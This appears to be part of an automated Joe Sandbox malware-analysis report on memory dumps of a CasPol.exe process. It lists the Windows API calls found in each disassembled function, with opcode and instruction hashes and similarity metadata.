                                                                                                                      • Opcode Fuzzy Hash: ede647240bc4334815e31b345ccdf8a44eda8e4811210c8123ef71aa606b129b
                                                                                                                      • Instruction Fuzzy Hash: 60412571E143858FCB05DFB9D4042EEBBF4AF8A310F148A6AC544EB291DB349845CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCB694A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 0c67a89da7b4300c38ac81164340c92247461cead8b777d1688d6df360ff359c
                                                                                                                      • Instruction ID: f49d30e9564755d428166eeb778c712354856509fbdc91079af94cc30bed0646
                                                                                                                      • Opcode Fuzzy Hash: 0c67a89da7b4300c38ac81164340c92247461cead8b777d1688d6df360ff359c
                                                                                                                      • Instruction Fuzzy Hash: EA51C0B1D00349DFDB14CFA9C980ADEBFB5BF88350F24862AE819AB210D7759945CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCB694A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 7ab6fbcda2acb53f40920cd9be6ad906160e0b41a0f09ccfd57a47dea0479919
                                                                                                                      • Instruction ID: 8c12b2b99177d6c6ab823b6c399f33c85e1d4f68df65586102b2c1036027341a
                                                                                                                      • Opcode Fuzzy Hash: 7ab6fbcda2acb53f40920cd9be6ad906160e0b41a0f09ccfd57a47dea0479919
                                                                                                                      • Instruction Fuzzy Hash: 2D41B0B1D00249DFDB14CFA9C980ADEBBB5BF88350F24852AE819AB210D771A945CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • TerminateThread.KERNEL32(45817C27,19F398C5), ref: 00D0F4A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255487605990.0000000000D0F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D0F000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_d0f000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: TerminateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1852365436-0
                                                                                                                      • Opcode ID: c53de2f50c7063ca5b424fa8981afb47775fb950fff78cd4494414daf5778a60
                                                                                                                      • Instruction ID: 19e28ef006f6764401e0457291f309cf7f188b8b3fa9f4f9e23ae8c0ce18e52b
                                                                                                                      • Opcode Fuzzy Hash: c53de2f50c7063ca5b424fa8981afb47775fb950fff78cd4494414daf5778a60
                                                                                                                      • Instruction Fuzzy Hash: 7D31E6316043554EDB308F24C8697E277A39F61B68FAD826AC8994B6E5C376C8C5CB21
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DCBB519
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714655100-0
                                                                                                                      • Opcode ID: 30aa470b69b387813c21635cc4a53f680551e52df79fafd5c1090af4a56a6bd8
                                                                                                                      • Instruction ID: 01a7c192423944938f01466981ec76e858d69ab8f7984eeaf11dd39186e59b5f
                                                                                                                      • Opcode Fuzzy Hash: 30aa470b69b387813c21635cc4a53f680551e52df79fafd5c1090af4a56a6bd8
                                                                                                                      • Instruction Fuzzy Hash: 804138B4900649CFDB14CF99C484A9ABBF5FF88314F24C859E519AB321C774E945CFA2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01205FD9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3660427363-0
                                                                                                                      • Opcode ID: 014c836f8dbefe910e702baab458a65b9ecbe3de4ebfc77d38460631338045e3
                                                                                                                      • Instruction ID: 29a9e43890abbde01792f7f6b9fda210275ae27aadceb5fef4defd4ded6474cf
                                                                                                                      • Opcode Fuzzy Hash: 014c836f8dbefe910e702baab458a65b9ecbe3de4ebfc77d38460631338045e3
                                                                                                                      • Instruction Fuzzy Hash: 7E31EEB1D102599FCB20CF9AC984A9EFFF5BF49310F14812AE918AB351D774A905CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01205FD9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3660427363-0
                                                                                                                      • Opcode ID: 8d401588a9d7c25fc36c76191d0cc2a8f99f17d66d72bbd86bbdd21ed0e90828
                                                                                                                      • Instruction ID: 6d9e15d4dc2dbaf40338a6636fb77b7f5068508affc0d8939f0d1a8f153cb978
                                                                                                                      • Opcode Fuzzy Hash: 8d401588a9d7c25fc36c76191d0cc2a8f99f17d66d72bbd86bbdd21ed0e90828
                                                                                                                      • Instruction Fuzzy Hash: BA31FFB1D102599FCB20CFA9C984ADEBFF5BF49300F14852AE818AB351D7759905CFA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 01205D1C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 71445658-0
                                                                                                                      • Opcode ID: 2fcd71cfe55d20ccaf9b52d701f13c6bcb1a6b62678ad81976208b84f549f95b
                                                                                                                      • Instruction ID: fcc164045e554d923e20ecb9ff95b897829309a14fa1724261be6836b977bdc1
                                                                                                                      • Opcode Fuzzy Hash: 2fcd71cfe55d20ccaf9b52d701f13c6bcb1a6b62678ad81976208b84f549f95b
                                                                                                                      • Instruction Fuzzy Hash: 8E31E0B0D102899FDB14CF99C588A8EFFF5BF48304F28866AE908AB341C7759945CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 01205D1C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 71445658-0
                                                                                                                      • Opcode ID: 71bbe0a3ec72ca28ed9cc6d5cebe47d8ac5df1cfe0f461923649c7c9ce242aa7
                                                                                                                      • Instruction ID: 667108d8adeee539e68667dd52af432b37f4b1cddeebd5827ab8f906c9ff2536
                                                                                                                      • Opcode Fuzzy Hash: 71bbe0a3ec72ca28ed9cc6d5cebe47d8ac5df1cfe0f461923649c7c9ce242aa7
                                                                                                                      • Instruction Fuzzy Hash: E13113B0D112898FDB10CFA9C588A8EFFF5BF49304F28866AD808AB351C3759945CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • TerminateThread.KERNEL32(45817C27,19F398C5), ref: 00D0F4A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255487605990.0000000000D0F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D0F000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_d0f000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: TerminateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1852365436-0
                                                                                                                      • Opcode ID: f6f1d3f3981fd491802f86e6881dca4c56fe36adf287290e37425855e68e8fdc
                                                                                                                      • Instruction ID: ebb7c7658078d495abceea1c79a407a32f058b046c8eb5d83ef106656b34ebd8
                                                                                                                      • Opcode Fuzzy Hash: f6f1d3f3981fd491802f86e6881dca4c56fe36adf287290e37425855e68e8fdc
                                                                                                                      • Instruction Fuzzy Hash: C421E7305003018EDF349F24D8997A13753AF61B98FAC817AD88D4B6F2C33284C5CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DCBA617
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: c494c6d5c80ed999ce0596a53cc413f7db599bd06b924f6c3edc3c34c12f068f
                                                                                                                      • Instruction ID: f8e90b55ccb214b4f04124a1e9ef9ff81845d2899b0e1176723ff8cc4793c12d
                                                                                                                      • Opcode Fuzzy Hash: c494c6d5c80ed999ce0596a53cc413f7db599bd06b924f6c3edc3c34c12f068f
                                                                                                                      • Instruction Fuzzy Hash: C821F3B5D00248AFDB00CFAAD984ADEBFF4EF49220F14841AE954A7351D378A954CF61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1DCBA499
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 26a9289a0140df1b87385df863c13677f31c2a95a8f1034af09fe2ccaf6ad6e9
                                                                                                                      • Instruction ID: d29719920f90d2eb725dcdc1310cba6308452d1b33f970db44136cb779c857c0
                                                                                                                      • Opcode Fuzzy Hash: 26a9289a0140df1b87385df863c13677f31c2a95a8f1034af09fe2ccaf6ad6e9
                                                                                                                      • Instruction Fuzzy Hash: E3218EB4A00649CFDB04CFA8D448AAEBBF5FF88314F208859E505AB351C735AD44CF66
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DCBA617
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: 993feac74c1c9336621c3c1052a82547a9f0a5a45483cf747c1d74f207c900e0
                                                                                                                      • Instruction ID: 4083a3e47654577b2667fd4a0f36e709ccbd3b748d4027abe7cad5ef786a9d38
                                                                                                                      • Opcode Fuzzy Hash: 993feac74c1c9336621c3c1052a82547a9f0a5a45483cf747c1d74f207c900e0
                                                                                                                      • Instruction Fuzzy Hash: 6221E0B5D002489FDB00CFAAD984ADEBFF8EB48320F10841AE954A7310D374A954CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0120A732), ref: 0120A81F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1890195054-0
                                                                                                                      • Opcode ID: 59a7a43b6ee7e32f5de0d953660f9dfac113642d8823f7edcb6b3335341de2b5
                                                                                                                      • Instruction ID: db3f70397a1580b0081816d1e40cd42fcfd3944322298d8ff23d492be5e1942a
                                                                                                                      • Opcode Fuzzy Hash: 59a7a43b6ee7e32f5de0d953660f9dfac113642d8823f7edcb6b3335341de2b5
                                                                                                                      • Instruction Fuzzy Hash: 3C1144B1C106598FCB00CFA9C5447DEFBB4AF49324F14866AD818B7640D378AA55CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0120A732), ref: 0120A81F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1890195054-0
                                                                                                                      • Opcode ID: 90d39e7a6e0c613216ee6b1b1c2df28b29ca07ff700e34e56902268b5cc6fab7
                                                                                                                      • Instruction ID: 880687ade62d189d728f10a99a6b8aa3d9f68699e2b91257a4f0c685ca781e41
                                                                                                                      • Opcode Fuzzy Hash: 90d39e7a6e0c613216ee6b1b1c2df28b29ca07ff700e34e56902268b5cc6fab7
                                                                                                                      • Instruction Fuzzy Hash: 8C11F2B1C106599BCB10CF9AC5447DEFBF8BF48224F10866AD914A7241D378AA55CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1DCB53F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: fd3160dfde337d18671bda7378b03e23f68113f7c4409b9698cffced002fcec0
                                                                                                                      • Instruction ID: da4a53123320b94d64a7e0334c749231e3c14ee364365739ff893334f0be6eb7
                                                                                                                      • Opcode Fuzzy Hash: fd3160dfde337d18671bda7378b03e23f68113f7c4409b9698cffced002fcec0
                                                                                                                      • Instruction Fuzzy Hash: 5311F6B5C006898FCB10CF9AC444BDEFFF4AF89214F14885AD859A7611D375A545CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1DCB53F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: 5bf97febf6e477bd2f9c1b64f2ca0ed05e7cf38932c16b0c01ccd1029ffa2056
                                                                                                                      • Instruction ID: 90405245293ff58eb789d2c1293601e1a1a5b4cec783dff8d154aa3e33b414c4
                                                                                                                      • Opcode Fuzzy Hash: 5bf97febf6e477bd2f9c1b64f2ca0ed05e7cf38932c16b0c01ccd1029ffa2056
                                                                                                                      • Instruction Fuzzy Hash: F911E2B5D006498FDB10CF9AD444A9EFBF4AB89210F10882AD819A7600D3B5A545CFA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255511982958.000000001DBFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DBFD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dbfd000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a40544e8cb99189021f4d31d11155f9f3861e208cc6dc3686bc648a44d0b466f
                                                                                                                      • Instruction ID: 98ac89b59c01b26ba2487c26854b567e13763da1267921593e5c9aab50c50cc4
                                                                                                                      • Opcode Fuzzy Hash: a40544e8cb99189021f4d31d11155f9f3861e208cc6dc3686bc648a44d0b466f
                                                                                                                      • Instruction Fuzzy Hash: 02210A71504240DFDB06CF58D9C0B16BF65FB84B24F24C569D90A0F24AC336E85ACBA3
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512079096.000000001DC0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DC0D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dc0d000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ca495d81054c7a4ecff8f216589a806a55317742e8e043cf95107024425b513a
                                                                                                                      • Instruction ID: 1de75dd673087c6bcc183bc1e7dddd5b48679a97fd100c39331b0c9713a17c7a
                                                                                                                      • Opcode Fuzzy Hash: ca495d81054c7a4ecff8f216589a806a55317742e8e043cf95107024425b513a
                                                                                                                      • Instruction Fuzzy Hash: 0C21F279604248DFDB01CF68D9C0B1ABB65FB84728F20C969E84D4B646C336D806CB62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512079096.000000001DC0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DC0D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dc0d000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d155d09e563a58313ba8856ec563fce352bbaeb1275a4b3065bacf23db93d3f5
                                                                                                                      • Instruction ID: b81fa17dbd086b81222c3c1ac8d2b8807a0f49dae514ae3249973428440065a0
                                                                                                                      • Opcode Fuzzy Hash: d155d09e563a58313ba8856ec563fce352bbaeb1275a4b3065bacf23db93d3f5
                                                                                                                      • Instruction Fuzzy Hash: C721A175508784DFC702CF24D994B15BF71EB46328F24C5EAD8498F696C33AD81ACB62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255511982958.000000001DBFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DBFD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dbfd000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c646d152c214f5cd70872129725550cad3e6f5ec7cfe052de72c885ef44d89a
                                                                                                                      • Instruction ID: 8ef11da2fe3876f5f8d0676dc3060d357c602a9a39addee41b45f512b6989cd2
                                                                                                                      • Opcode Fuzzy Hash: 9c646d152c214f5cd70872129725550cad3e6f5ec7cfe052de72c885ef44d89a
                                                                                                                      • Instruction Fuzzy Hash: 1B119376504280DFDB01CF14D5C4B16BF71FB84724F24C6A9D94A4B656C33AE45ACBA2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255489784172.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1160000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 939f41e5d86d9b2a745b6f4763634d262d7b6df35ad7f7e9747b4b9261ca4f0a
                                                                                                                      • Instruction ID: 010a4f48c9cbf6bd36c81a35bb53607944e79a15e055e7f8e95aa7adde48ded2
                                                                                                                      • Opcode Fuzzy Hash: 939f41e5d86d9b2a745b6f4763634d262d7b6df35ad7f7e9747b4b9261ca4f0a
                                                                                                                      • Instruction Fuzzy Hash: 75614530B093854FD7168B78D414AAA3FF59F82204F1584BAD149DB693EB3ADC06C792
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%